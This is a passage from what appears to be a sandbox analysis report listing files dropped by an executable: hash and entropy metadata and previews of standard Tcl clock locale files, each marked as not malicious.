                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ru DAYS_OF_WEEK_ABBREV [list \.. "\u0412\u0441"\.. "\u041f\u043d"\.. "\u0412\u0442"\.. "\u0421\u0440"\.. "\u0427\u0442"\.. "\u041f\u0442"\.. "\u0421\u0431"].. ::msgcat::mcset ru DAYS_OF_WEEK_FULL [list \.. "\u0432\u043e\u0441\u043a\u0440\u0435\u0441\u0435\u043d\u044c\u0435"\.. "\u043f\u043e\u043d\u0435\u0434\u0435\u043b\u044c\u043d\u0438\u043a"\.. "\u0432\u0442\u043e\u0440\u043d\u0438\u043a"\.. "\u0441\u0440\u0435\u0434\u0430"\.. "\u0447\u0435\u0442\u0432\u0435\u0440\u0433"\.. "\u043f\u044f\u0442\u043d\u0438\u0446\u0430"\.. "\u0441\u0443\u0431\u0431\u043e\u0442\u0430"].. ::msgcat::mcset ru MONTHS_ABBREV [list \.. "\u044f\u043d\u0432"\.. "\u0444\u0435\u0432"\.. "\u043c\u0430\u0440"\.. "\u0430\u043f\u0440"\.. "\u043c\u0430\u0439"\.. "\u0438\u044e\u
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):248
                                                                                                                                                                                                                              Entropy (8bit):4.9420431225061
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xoVAgWIZoVY9X3vtfNrsoVA9+3vW6Q9vn:4EnLB383SFWIyaX3vtNl/3vWHNn
                                                                                                                                                                                                                              MD5:DC98D88964650E302BE97FDB3B33326E
                                                                                                                                                                                                                              SHA1:1DDDCC4265D7B980B867FEE674BEF2FD87D823F7
                                                                                                                                                                                                                              SHA-256:13E4E79A0ED82034BADE0CFF8DEF5DE1222F6968108AD710662BDB7DAF36D7E1
                                                                                                                                                                                                                              SHA-512:F3B9D528C529DD520FEDA3C20ED354E521C5B3C29F3317E15B7939CE06A3D67554D34DD6E54FE038585E46C560C604A1FD7E7F84914086B5994D52CE2C9E99CE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ru_UA DATE_FORMAT "%d.%m.%Y".. ::msgcat::mcset ru_UA TIME_FORMAT "%k:%M:%S".. ::msgcat::mcset ru_UA DATE_TIME_FORMAT "%d.%m.%Y %k:%M:%S %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1212
                                                                                                                                                                                                                              Entropy (8bit):4.359036493565628
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83/YIXo4YY0dD6kMm7fX2NaSIvZdHZgHZ/IxvaGWxvtl9svWTN:43rLTR44/yWltOWB
                                                                                                                                                                                                                              MD5:E297221FA73BD78577B398BC7D061D21
                                                                                                                                                                                                                              SHA1:F2A6B456272F913A9E97C495CEE73AC774C90FA1
                                                                                                                                                                                                                              SHA-256:E65D6E5E837DF0A2DF0DB77BCE45334BBC27EFFF9023C37119E75D49932D9D6C
                                                                                                                                                                                                                              SHA-512:AB9DDAE7CB21193C7753041F0B88CF2D40987E7E604B47816219458D217F084AA4EBF36719E22AAB3FD71A271D9F956ADC353182991903D7ADE8C8F00F6B2F9B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset sh DAYS_OF_WEEK_ABBREV [list \.. "Ned"\.. "Pon"\.. "Uto"\.. "Sre"\.. "\u010cet"\.. "Pet"\.. "Sub"].. ::msgcat::mcset sh DAYS_OF_WEEK_FULL [list \.. "Nedelja"\.. "Ponedeljak"\.. "Utorak"\.. "Sreda"\.. "\u010cetvrtak"\.. "Petak"\.. "Subota"].. ::msgcat::mcset sh MONTHS_ABBREV [list \.. "Jan"\.. "Feb"\.. "Mar"\.. "Apr"\.. "Maj"\.. "Jun"\.. "Jul"\.. "Avg"\.. "Sep"\.. "Okt"\.. "Nov"\.. "Dec"\.. ""].. ::msgcat::mcset sh MONTHS_FULL [list \.. "Januar"\.. "Februar"\.. "Mart"\.. "April"\.. "Maj"\.. "Juni"\.. "Juli"\.. "Avgust"\.. "Septembar"\.. "Oktobar"\.. "Novembar"\.. "Decembar"\.. ""].. ::msgcat::mcset sh BC
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1255
                                                                                                                                                                                                                              Entropy (8bit):4.4043119723436135
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83c46o40u3rIsmJIcm93ApLDVb2IcU95WFGEXF3eUCvtz/v3e6:43c3ow3rF93Ap7tEXFREtznp
                                                                                                                                                                                                                              MD5:24DA40901D907D35195CC1B3A675EBC7
                                                                                                                                                                                                                              SHA1:8AF31248F06FADA5CFB0D83A940CFF5CE70E2577
                                                                                                                                                                                                                              SHA-256:976813F6C53C9BEBBF976B0F560FD7FC5E4EC4C574D7E1CD31F9A4056765CB7A
                                                                                                                                                                                                                              SHA-512:A9BC6AAFE9AEEDFD1E483E54A2D27871A09ADD6807D8F90410CD2BB82A91BA9DF435652EC9A7C3AD0A080D7F153CA848BB47DAD3936BA30E4AEFF3C474C433CC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset sk DAYS_OF_WEEK_ABBREV [list \.. "Ne"\.. "Po"\.. "Ut"\.. "St"\.. "\u0160t"\.. "Pa"\.. "So"].. ::msgcat::mcset sk DAYS_OF_WEEK_FULL [list \.. "Nede\u013ee"\.. "Pondelok"\.. "Utorok"\.. "Streda"\.. "\u0160tvrtok"\.. "Piatok"\.. "Sobota"].. ::msgcat::mcset sk MONTHS_ABBREV [list \.. "jan"\.. "feb"\.. "mar"\.. "apr"\.. "m\u00e1j"\.. "j\u00fan"\.. "j\u00fal"\.. "aug"\.. "sep"\.. "okt"\.. "nov"\.. "dec"\.. ""].. ::msgcat::mcset sk MONTHS_FULL [list \.. "janu\u00e1r"\.. "febru\u00e1r"\.. "marec"\.. "apr\u00edl"\.. "m\u00e1j"\.. "j\u00fan"\.. "j\u00fal"\.. "august"\.. "september"\.. "okt\u00f3ber"\.. "november"\.. "decem
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1216
                                                                                                                                                                                                                              Entropy (8bit):4.333705818952628
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83MIXpC9opYuGS/BrIsmZ5hv1yAxyIVjd392WFThENvt0vJoO:43fXYujZrqyApYJtyR
                                                                                                                                                                                                                              MD5:CB76F54CBE0D1AAE8BA956B4C51CBD2A
                                                                                                                                                                                                                              SHA1:C1F78375EDB0BD2504553E33B2024C0C63FDB1B2
                                                                                                                                                                                                                              SHA-256:11A6264676DBED87E4F718075127E32E107854F35F141642454F484984084486
                                                                                                                                                                                                                              SHA-512:69964348FF08DE6EEB5E3DD61057FF0DF5441105EB7BEE7FB7E9AC5E26DCC164E3C7C011CA5CD7BC5B97A7872532331C97CCBC80563F6C5A3548014BFA8BEF16
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset sl DAYS_OF_WEEK_ABBREV [list \.. "Ned"\.. "Pon"\.. "Tor"\.. "Sre"\.. "\u010cet"\.. "Pet"\.. "Sob"].. ::msgcat::mcset sl DAYS_OF_WEEK_FULL [list \.. "Nedelja"\.. "Ponedeljek"\.. "Torek"\.. "Sreda"\.. "\u010cetrtek"\.. "Petek"\.. "Sobota"].. ::msgcat::mcset sl MONTHS_ABBREV [list \.. "jan"\.. "feb"\.. "mar"\.. "apr"\.. "maj"\.. "jun"\.. "jul"\.. "avg"\.. "sep"\.. "okt"\.. "nov"\.. "dec"\.. ""].. ::msgcat::mcset sl MONTHS_FULL [list \.. "januar"\.. "februar"\.. "marec"\.. "april"\.. "maj"\.. "junij"\.. "julij"\.. "avgust"\.. "september"\.. "oktober"\.. "november"\.. "december"\.. ""].. ::msgcat::mcset sl B
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1321
                                                                                                                                                                                                                              Entropy (8bit):4.408176575111904
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83F7ONQEwXwjjTlVoSEh76W/X+WZQJ4hv+H6v2V:43NwjPEwl4VQ8q
                                                                                                                                                                                                                              MD5:E606F620F03EC0FBDBE6551601299C5F
                                                                                                                                                                                                                              SHA1:0B50AB679E8D90D8E7319BCADAC426E004594D3B
                                                                                                                                                                                                                              SHA-256:1F4EFD78F6B45B65F73F09B2F52FC13C2A7C4138DCB7664804878D197B6EBDF9
                                                                                                                                                                                                                              SHA-512:08AF2B51EB7111E334ADDA3A03F9A8816C104E9742B523EC363FB5131A3DF73D298A8DDCD573D23C23C65CCFD2B8898DF75AE3D4F04BF80744044FB6BAB5EC0A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset sq DAYS_OF_WEEK_ABBREV [list \.. "Die"\.. "H\u00ebn"\.. "Mar"\.. "M\u00ebr"\.. "Enj"\.. "Pre"\.. "Sht"].. ::msgcat::mcset sq DAYS_OF_WEEK_FULL [list \.. "e diel"\.. "e h\u00ebn\u00eb"\.. "e mart\u00eb"\.. "e m\u00ebrkur\u00eb"\.. "e enjte"\.. "e premte"\.. "e shtun\u00eb"].. ::msgcat::mcset sq MONTHS_ABBREV [list \.. "Jan"\.. "Shk"\.. "Mar"\.. "Pri"\.. "Maj"\.. "Qer"\.. "Kor"\.. "Gsh"\.. "Sht"\.. "Tet"\.. "N\u00ebn"\.. "Dhj"\.. ""].. ::msgcat::mcset sq MONTHS_FULL [list \.. "janar"\.. "shkurt"\.. "mars"\.. "prill"\.. "maj"\.. "qershor"\.. "korrik"\.. "gusht"\.. "shtator"\.. "tetor"\.. "n\u00ebntor"\.. "dhjetor"\.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2087
                                                                                                                                                                                                                              Entropy (8bit):4.307749748884122
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:43ilQTSBQrQP9QenzMKSFD9NI/QiNQEQrQL1KKYjU5rtAx:2I5EyLMKSFZNIYMzYMKKiqW
                                                                                                                                                                                                                              MD5:BF363AB60B57F6D8FDCDBFD230A28DDF
                                                                                                                                                                                                                              SHA1:6375CBA0A2197DA7E65BEE45C42F02C4F0B9142D
                                                                                                                                                                                                                              SHA-256:FA00A7B22C9941F6C2B893F22B703DCB159CA2F2E4005FD6A74A632AEB786BFA
                                                                                                                                                                                                                              SHA-512:91AD8085EF321A5A0E4D2ED204940CB66E8E230BBEDE59A8A07D1CEED9155FCC6B075A1FCC44AE834C1FEEEB3A59256C4310684C5AC453D4C50DFABD88469814
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset sr DAYS_OF_WEEK_ABBREV [list \.. "\u041d\u0435\u0434"\.. "\u041f\u043e\u043d"\.. "\u0423\u0442\u043e"\.. "\u0421\u0440\u0435"\.. "\u0427\u0435\u0442"\.. "\u041f\u0435\u0442"\.. "\u0421\u0443\u0431"].. ::msgcat::mcset sr DAYS_OF_WEEK_FULL [list \.. "\u041d\u0435\u0434\u0435\u0459\u0430"\.. "\u041f\u043e\u043d\u0435\u0434\u0435\u0459\u0430\u043a"\.. "\u0423\u0442\u043e\u0440\u0430\u043a"\.. "\u0421\u0440\u0435\u0434\u0430"\.. "\u0427\u0435\u0442\u0432\u0440\u0442\u0430\u043a"\.. "\u041f\u0435\u0442\u0430\u043a"\.. "\u0421\u0443\u0431\u043e\u0442\u0430"].. ::msgcat::mcset sr MONTHS_ABBREV [list \.. "\u0408\u0430\u043d"\.. "\u0424\u0435\u0431"\.. "\u041c\u0430\u0440"\.. "\u0410\u043f\u0440"\.. "\u041c\u0430\u0458"\.. "\u0408\u0443\u043d"\.. "\
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1219
                                                                                                                                                                                                                              Entropy (8bit):4.3542418837714285
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83qoLt6yLQoAusrIsmZ5m4AcjTHX92WFfjr4MvBvX:43ZLxQNusrr4Aw3Jkq1X
                                                                                                                                                                                                                              MD5:3B5C3FFA0829768470BDA1B46D882060
                                                                                                                                                                                                                              SHA1:C96799036EC5CCDE799A6B50CD7748908935A2F3
                                                                                                                                                                                                                              SHA-256:483916B51BD7E071E88F9EC36AAF3E08FEA823991532F832DE491C6C40B55A9F
                                                                                                                                                                                                                              SHA-512:684FA249123878AA7F856DF0FD3B0D9F041113CFEA8EEFA47D0E1948DA23694330BF0D62BA896A3891CD559C16CAE9330BF31508F530AC003D2929D5FD9246D8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset sv DAYS_OF_WEEK_ABBREV [list \.. "s\u00f6"\.. "m\u00e5"\.. "ti"\.. "on"\.. "to"\.. "fr"\.. "l\u00f6"].. ::msgcat::mcset sv DAYS_OF_WEEK_FULL [list \.. "s\u00f6ndag"\.. "m\u00e5ndag"\.. "tisdag"\.. "onsdag"\.. "torsdag"\.. "fredag"\.. "l\u00f6rdag"].. ::msgcat::mcset sv MONTHS_ABBREV [list \.. "jan"\.. "feb"\.. "mar"\.. "apr"\.. "maj"\.. "jun"\.. "jul"\.. "aug"\.. "sep"\.. "okt"\.. "nov"\.. "dec"\.. ""].. ::msgcat::mcset sv MONTHS_FULL [list \.. "januari"\.. "februari"\.. "mars"\.. "april"\.. "maj"\.. "juni"\.. "juli"\.. "augusti"\.. "september"\.. "oktober"\.. "november"\.. "december"\.. ""].. ::msgcat:
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1040
                                                                                                                                                                                                                              Entropy (8bit):4.108744949579904
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:4EnLB383A4mScvhkzoR4mtuWckRkoay3UVxMmALfG7IdzVJ633xRCPLMYMvYo76u:4aR83/Shkz1uckO76kMmEf62qOTdMvvn
                                                                                                                                                                                                                              MD5:5774860C8AEECBD48F1502E616158CAB
                                                                                                                                                                                                                              SHA1:DE7059713EA7913A0C79F5386833CE2BCAD2CFD7
                                                                                                                                                                                                                              SHA-256:1DA068C9AA02EF14A2440758C6040D632D96044A20EC501DBB9E40D8592E0E7F
                                                                                                                                                                                                                              SHA-512:91E69222DDF55E9E0E389DB77D7A0F2E082351DC3FB34A1A2C1E350E4187E8BB940F6C2EDE1B8651159C2787AA0BE4D7268F33F7A82CAED03514FCE462530408
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset sw DAYS_OF_WEEK_ABBREV [list \.. "Jpi"\.. "Jtt"\.. "Jnn"\.. "Jtn"\.. "Alh"\.. "Iju"\.. "Jmo"].. ::msgcat::mcset sw DAYS_OF_WEEK_FULL [list \.. "Jumapili"\.. "Jumatatu"\.. "Jumanne"\.. "Jumatano"\.. "Alhamisi"\.. "Ijumaa"\.. "Jumamosi"].. ::msgcat::mcset sw MONTHS_ABBREV [list \.. "Jan"\.. "Feb"\.. "Mar"\.. "Apr"\.. "Mei"\.. "Jun"\.. "Jul"\.. "Ago"\.. "Sep"\.. "Okt"\.. "Nov"\.. "Des"\.. ""].. ::msgcat::mcset sw MONTHS_FULL [list \.. "Januari"\.. "Februari"\.. "Machi"\.. "Aprili"\.. "Mei"\.. "Juni"\.. "Julai"\.. "Agosti"\.. "Septemba"\.. "Oktoba"\.. "Novemba"\.. "Desemba"\.. ""].. ::msgcat::mcset sw BCE "
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1874
                                                                                                                                                                                                                              Entropy (8bit):4.080580566597515
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83AI0xnJdnQhmHlHYPKtul+eOPfIxyH5ztUSLu8tptLtrl+eOPfIxyH5ztUSU:43N0dQmHlHYPKtu1HxMtr1Hx/
                                                                                                                                                                                                                              MD5:85288236C3997302EA26D7403BBA2C15
                                                                                                                                                                                                                              SHA1:05AB389CC4DCF17B37BFF6ED1ECD58D6E9850A01
                                                                                                                                                                                                                              SHA-256:AEFDC4255890D5B3FFE5CEE1B457B7D711283C2287ABA644155C10956012F6C1
                                                                                                                                                                                                                              SHA-512:8E389D46606176EE14B8356153095B49C9426B80139B672A620F488891F091D1A272D4FB116775900E4AB4EC84DDDEBD8D6AF81AC672F14F148F2BFC638D2B10
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ta DAYS_OF_WEEK_FULL [list \.. "\u0b9e\u0bbe\u0baf\u0bbf\u0bb1\u0bc1"\.. "\u0ba4\u0bbf\u0b99\u0bcd\u0b95\u0bb3\u0bcd"\.. "\u0b9a\u0bc6\u0bb5\u0bcd\u0bb5\u0bbe\u0baf\u0bcd"\.. "\u0baa\u0bc1\u0ba4\u0ba9\u0bcd"\.. "\u0bb5\u0bbf\u0baf\u0bbe\u0bb4\u0ba9\u0bcd"\.. "\u0bb5\u0bc6\u0bb3\u0bcd\u0bb3\u0bbf"\.. "\u0b9a\u0ba9\u0bbf"].. ::msgcat::mcset ta MONTHS_ABBREV [list \.. "\u0b9c\u0ba9\u0bb5\u0bb0\u0bbf"\.. "\u0baa\u0bc6\u0baa\u0bcd\u0bb0\u0bb5\u0bb0\u0bbf"\.. "\u0bae\u0bbe\u0bb0\u0bcd\u0b9a\u0bcd"\.. "\u0b8f\u0baa\u0bcd\u0bb0\u0bb2\u0bcd"\.. "\u0bae\u0bc7"\.. "\u0b9c\u0bc2\u0ba9\u0bcd"\.. "\u0b9c\u0bc2\u0bb2\u0bc8"\.. "\u0b86\u0b95\u0bb8\u0bcd\u0b9f\u0bcd"\.. "\u0b9a\u0bc6\u0baa\u0bcd\u0b9f\u0bae\u0bcd\u0baa\u0bb0\u0bcd"\.. "\u0b85\u0b95\u0bcd\u0b9f\u0bcb\u0baa\u0bb0\u0bcd"\.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):257
                                                                                                                                                                                                                              Entropy (8bit):4.863003494480733
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xosDv+IZosK3v6ry/5osDo+3v+6f6HyFvn:4EnLB383ZDvl5K3v6ry/ZDF3vmSVn
                                                                                                                                                                                                                              MD5:CF078352DA0507C767F04E31D6C14296
                                                                                                                                                                                                                              SHA1:0A9B1255BD85B60D3620AE61370F54748AB7A182
                                                                                                                                                                                                                              SHA-256:4978A193076DE56944236F7F1DCECACFF739536DFB3DBEFC1F7FE2B97A8AEAF4
                                                                                                                                                                                                                              SHA-512:6FFC85B2A8DECB373EC76B1CD1A9459A30E443319F2C8DB9BBE6E115F5EFEEBAC314D4E8BE996EA55EE46466C6F6057A73078F5FDCF1C4CBAF1A270E45BC10C0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ta_IN DATE_FORMAT "%d %M %Y".. ::msgcat::mcset ta_IN TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset ta_IN DATE_TIME_FORMAT "%d %M %Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2149
                                                                                                                                                                                                                              Entropy (8bit):4.097884113767283
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:43a8mxI9k3JR0UjjFbPcniLHVktjjFbPcniLHVM:2a8v9k3JdbPcIidbPcIG
                                                                                                                                                                                                                              MD5:61E4CB2AAD66285E9113071057F39C35
                                                                                                                                                                                                                              SHA1:A2BD21090859669C4B6A875E077825381B7E2702
                                                                                                                                                                                                                              SHA-256:9E96C7123100234A7018533764502985A208F2EB3314F5B6332D46016725A63F
                                                                                                                                                                                                                              SHA-512:589A2D65508B07B5FDEDA883F71A4B496B25458CA1ECE7C4D4F5DAE82EB683DA82C8E21E57D63A235AB600174C9D362A746B2E27BAA6E3ADE1B7BD9D6000BE27
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset te DAYS_OF_WEEK_ABBREV [list \.. "\u0c06\u0c26\u0c3f"\.. "\u0c38\u0c4b\u0c2e"\.. "\u0c2e\u0c02\u0c17\u0c33"\.. "\u0c2c\u0c41\u0c27"\.. "\u0c17\u0c41\u0c30\u0c41"\.. "\u0c36\u0c41\u0c15\u0c4d\u0c30"\.. "\u0c36\u0c28\u0c3f"].. ::msgcat::mcset te DAYS_OF_WEEK_FULL [list \.. "\u0c06\u0c26\u0c3f\u0c35\u0c3e\u0c30\u0c02"\.. "\u0c38\u0c4b\u0c2e\u0c35\u0c3e\u0c30\u0c02"\.. "\u0c2e\u0c02\u0c17\u0c33\u0c35\u0c3e\u0c30\u0c02"\.. "\u0c2c\u0c41\u0c27\u0c35\u0c3e\u0c30\u0c02"\.. "\u0c17\u0c41\u0c30\u0c41\u0c35\u0c3e\u0c30\u0c02"\.. "\u0c36\u0c41\u0c15\u0c4d\u0c30\u0c35\u0c3e\u0c30\u0c02"\.. "\u0c36\u0c28\u0c3f\u0c35\u0c3e\u0c30\u0c02"].. ::msgcat::mcset te MONTHS_ABBREV [list \.. "\u0c1c\u0c28\u0c35\u0c30\u0c3f"\.. "\u0c2b\u0c3f\u0c2c\u0c4d\u0c30\u0c35\u0c30\u0c3f"\.. "\u0c2e\u0c3
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):419
                                                                                                                                                                                                                              Entropy (8bit):5.058324650031252
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:4EnLB383LjZWsn0sHjoD0savzda3v6ry/ZF3vMSVn:4aR833Z1nnHjoDnavzd8vSCZNvMSV
                                                                                                                                                                                                                              MD5:BCA040A356E7E8CC597EFB9B9065F8E1
                                                                                                                                                                                                                              SHA1:ADAF7EC8C2035BC06E168D3F1BD7F39277E9273F
                                                                                                                                                                                                                              SHA-256:B110FEEDDA21ECCEFA624BEF8E1476E9F221FB253880AC370967AE4D0237CA7A
                                                                                                                                                                                                                              SHA-512:D408ECE8CF89FB23B45420D3CBA7655EEE713498210889A84EE25D3417360705546D97028EAAAA47764B6E9B0A3699669B98C0A53861A38E0DFCB9F3B8A47BEC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset te_IN AM "\u0c2a\u0c42\u0c30\u0c4d\u0c35\u0c3e\u0c39\u0c4d\u0c28".. ::msgcat::mcset te_IN PM "\u0c05\u0c2a\u0c30\u0c3e\u0c39\u0c4d\u0c28".. ::msgcat::mcset te_IN DATE_FORMAT "%d/%m/%Y".. ::msgcat::mcset te_IN TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset te_IN DATE_TIME_FORMAT "%d/%m/%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2359
                                                                                                                                                                                                                              Entropy (8bit):4.382796122808316
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:439X4QKPQJecQwFA0P9JmDsxQ7KHfWkD2CQM0DnWxFDzCYmdrtVP:29ohCi1028QmHfIC4jW3DmHB
                                                                                                                                                                                                                              MD5:7F61E1EA256D78948189EF07119663CD
                                                                                                                                                                                                                              SHA1:6867E9780049FACE9984B7788B6F362B8D1AD718
                                                                                                                                                                                                                              SHA-256:48BEAF693BF5B6EED15234DB0D375B97E6D576A749E9048420C153E6CAFC0259
                                                                                                                                                                                                                              SHA-512:F3E24E0B41A7D722AC2FA0E429A2DCB1CCB5BAECC9912ADF6AF79C51366EA1AC9F931F0F44F068F3CEE6873516E6223CC5E7616CF523B1DFB9E528DE4D58454A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset th DAYS_OF_WEEK_ABBREV [list \.. "\u0e2d\u0e32."\.. "\u0e08."\.. "\u0e2d."\.. "\u0e1e."\.. "\u0e1e\u0e24."\.. "\u0e28."\.. "\u0e2a."].. ::msgcat::mcset th DAYS_OF_WEEK_FULL [list \.. "\u0e27\u0e31\u0e19\u0e2d\u0e32\u0e17\u0e34\u0e15\u0e22\u0e4c"\.. "\u0e27\u0e31\u0e19\u0e08\u0e31\u0e19\u0e17\u0e23\u0e4c"\.. "\u0e27\u0e31\u0e19\u0e2d\u0e31\u0e07\u0e04\u0e32\u0e23"\.. "\u0e27\u0e31\u0e19\u0e1e\u0e38\u0e18"\.. "\u0e27\u0e31\u0e19\u0e1e\u0e24\u0e2b\u0e31\u0e2a\u0e1a\u0e14\u0e35"\.. "\u0e27\u0e31\u0e19\u0e28\u0e38\u0e01\u0e23\u0e4c"\.. "\u0e27\u0e31\u0e19\u0e40\u0e2a\u0e32\u0e23\u0e4c"].. ::msgcat::mcset th MONTHS_ABBREV [list \.. "\u0e21.\u0e04."\.. "\u0e01.\u0e1e."\.. "\u0e21\u0e35.\u0e04."\.. "\u0e40\u0e21.\u0e22."\.. "\u0e1e.\u0e04."\.. "\u0e21\u0
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
